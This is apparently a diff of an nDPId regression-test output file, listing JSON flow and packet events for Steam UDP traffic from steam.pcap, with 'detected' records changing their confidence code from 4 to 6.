00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1357332164925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164925,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS4AAIAROeqSQpgMwKi8lWmKsmEANAVPVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAJg+KI\/QAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1357332164927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164927,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS8AAIAR3dZIpT28wKi8lWmJsmEANMuoVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAUb2BCq8AAAA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1357332164936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164936,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARQa3AqLyV0G+rUrJhaYkALGIgVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1357332164936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164936,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxHAqLyVSKU9ubJhaYoALFeDVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1357332164937,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164937,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYsALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1357332164937,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164937,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYkALLOSVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1357332164974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164974,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTAAAIAR3dhIpT25wKi8lWmKsmEANKoaVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAABVTtA7EAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1357332164980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164980,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTEAAIARxIVEjlsiwKi8lWmJsmEANIkpVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA3X7NeAABAAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1357332164986,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164986,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYkALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxzAqLyVSKU9rrJhaYkALFePVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qfAqLyVRRyRq7JhaYkALAcbVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6rAqLyV0G+FVbJhaYoALIgcVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1357332165015,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165015,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTIAAIAROeSSQpgOwKi8lWmLsmEANBm8VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAc5jYKUQBAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1357332165017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165017,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTMAAIAR6HHQb6tSwKi8lWmJsmEANJoiVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA03wFcOUAAAA="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1357332165020,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165020,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTQAAIARjWtFHJGrwKi8lWmJsmEANNwtVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAk2i\/c84AAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1357332165027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165027,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTUAAIAR3d5IpT2uwKi8lWmJsmEANL5BVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAyxQbKKkAAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYoALBkxVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165037,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1357332165037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165037,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxvAqLyVSKU9r7JhaYkALFeOVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 